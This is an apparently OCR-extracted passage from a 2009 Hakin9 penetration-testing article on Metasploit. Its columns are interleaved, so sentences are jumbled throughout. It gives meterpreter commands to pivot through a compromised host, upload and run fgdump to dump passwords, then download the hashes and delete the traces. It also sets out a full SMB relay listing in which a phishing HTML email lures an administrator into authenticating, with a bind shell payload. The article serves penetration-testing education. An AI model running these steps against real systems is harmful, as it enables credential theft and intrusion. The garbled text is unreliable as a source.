192.168.1.0 255.255.255.0 Session 1 route add <subnet><netmask><session-id> 2/2009 HAKIN9 31
  • 9. ATTACK We get: meterpreter>download 127.0.0.1.pwdump an SMB server. First discovered in 2001, meterpreter>execute -f cmd.exe -c -H -i this wasn't patched until November 2008. msf exploit(handler) > route add C:Documents and SettingsFail User Fire up your MSF console – on Linux, this 192.168.1.0 255.255.255.0 1 My Documents>del 127.* exploit uses a restricted port, so you will C:Documents and SettingsFail User have to run it as root. Then type as shown Then view with: My Documents>del 2008* in Listing 9. Now, e-mail a targeted user (preferably msf exploit(handler) > route print Now, we simply need to execute our an administrative user) with an HTML email, Nmap scan, and after that, analyse the referencing an image in the following way: Active Routing Table vulnerabilities, and exploit the server the ==================== same way you would any other host. For <img src=//192.168.1.2/logo.jpg> Subnet Netmask Gateway this scan, I did something very quick and ------ ------- ------- basic, but you can specify it however you Provided that user has administrative 192.168.1.0 255.255.255.0 Session 1 like (see Figure 7): authentication, your MSF will authenticate with it and receive a shell session in We can then do an Nmap scan (still from the msf exploit (handler) > nmap -P0 which you can perform exactly the same backgrounded session console) to find more 192.168.1.1 actions as the previous shell. This is just vulnerabilities, hosts, etc., and then proceed an alternative method of bypassing certain to exploit further hosts with Metasploit and Exploiting SMB with outside restrictions. interact with those sessions. Let's take a look Metasploit from a at a few of these in action (see Figure 5). Penetration Testing Conclusion To start, we'll do a dump of local Viewpoint It can be seen that social engineering passwords. Go grab a copy of fgdump Sometimes, sending a program or plays a huge role in some penetration from http://www.foofus.net/fizzgig/fgdump/ dropping a flash drive is a little too obvious tests, and when combined with the power downloads.htm and unarchive that to your for a company to fall for. In this case a of certain exploitation frameworks, can be local Metasploit Directory. Now, upload it, simple e-mail might be the easiest solution. very effective in levering into a company and execute it, using the technicues you This little trick uses the e-mail to reference during a penetration tests. This article is learnt before. Then, we will download a an image that does not exist on the PC designed to get you thinking a little bit more copy of the passwords, and delete it from you are using, where Metasploit is listening about alternative means of entry during a the remote PC (see Figure 6): and waiting to inject or bind a shell. penetration test, and hopefully it has done This is due to a vulnerability where any just that. The best defense is to stay up to meterpreter>upload fgdump.exe Windows PC (that hasn't been updated) date with patches, and to put all your staff fgdump.exe will automatically look up and attempt to through basic security training. Doing this meterpreter>execute -f fgdump.exe -i -H authenticate any image or file located on will greatly alleviate the risk of someone performing a successful attack using these methods. On the 'Net • http://en.wikipedia.org/wiki/Metasploit Thanks • http://metasploit.com I'd also like to take the time to thank a • http://en.wikipedia.org/wiki/SMBRelay few people and groups who helped with • http://microsoft.com/technet/sysinternals/utilities/psexec.mspx various testing and discussions over the • Syngress Press – Metasploit Toolkit for Penetration Testing, Exploit Development, and course of this article: Aneta Zysk, Tim Vulnerability Research – Copyright 2007 by Elsevier, Inc. All rights reserved. Goddard, Stuart Burfield, and Harley Cummins for their willingness to participate Listing 9. Setting up an SMB Relay Attack with remote testing. H.D. Moore and the Metasploit team for providing such a useful msf > use exploit/windows/smb/smb_relay msf > info <--- just for a little bit more information about the attack tool. Jesse for his motivation. And finally, the msf exploit(smb_relay) > set srvhost 192.168.1.2 guys from TRH for all your help in providing srvhost => 192.168.1.2 remote shells where needed (for testing msf exploit(smb_relay) > set lhost 192.168.1.2 purposes). lhost => 192.168.1.2 msf exploit(smb_relay) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf exploit(smb_relay) > exploit Stephen Argent [*] Exploit running as background job. Stephen is currently working a number of jobs, while studying to obtain his Advanced Diploma in Network [*] Started bind handler Security. Stephen runs http://greyhat-security.com as [*] Server started. a hobby, and can be contacted at stephen@greyhat- security.com 32 HAKIN9 2/2009